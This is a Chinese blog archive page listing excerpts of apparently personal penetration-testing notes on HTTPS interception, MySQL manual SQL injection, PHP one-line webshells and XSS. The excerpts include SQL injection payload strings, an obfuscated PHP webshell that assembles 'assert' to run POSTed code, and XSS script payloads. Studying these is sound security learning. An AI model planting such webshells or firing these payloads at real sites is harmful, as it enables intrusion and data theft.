Loading

上一页 1 ··· 14 15 16 17 18
摘要: https中间人攻击 使用tls/ssl方法进行加密传输 http攻击方法 降级攻击 解密攻击(明文,证书伪造) 协议漏洞,实现漏洞,配置不严格 openssl openssl s_client -connect www.baidu.com:443 **** sslscan 自动识别ssl配置错误, 阅读全文
posted @ 2022-05-27 13:49 nsfoxer 阅读(38) 评论(0) 推荐(0) 编辑
摘要: mysql手工注入 注释后面语句(引号闭合) 常用的注释payload or 1=1--+ 'or 1=1--+ "or 1=1--+ )or 1=1--+ ')or 1=1--+ ") or 1=1--+ "))or 1=1--+ 查询字段数目() 查询字段数目主要利用MySQL里面的 order 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(7) 评论(0) 推荐(0) 编辑
摘要: 一句话木马 php 方法 字符串变形: substr(string, start, length) <?php $a = 'a'.'s'.'s'.'e'.'r'.'t'; $a($_POST['x']); ?> <?php $a = substr('1a',1).'s'.'s'.'e'.'r'.'t 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(79) 评论(0) 推荐(0) 编辑
摘要: sql注入整理 ' or 1=1--+ ' or 1=1-- ' or 1=1# ' or 1='1 ' || 1='1 ' || 1=1--+ ')or('a'='a "or"="a'='a --> ??? 'or''=' 'or'='or' -->??? 1 or '1'='1'=1 -->?? 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(6) 评论(0) 推荐(0) 编辑
摘要: xss ​ cross-site-scripting ​ javascript 嵌入html <sctipt>alert("XSS");</script> 元素标签:<body onload=alert('XSS')> 图片:<img src="javascript:alert("XSS);"> 其 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(10) 评论(0) 推荐(0) 编辑
上一页 1 ··· 14 15 16 17 18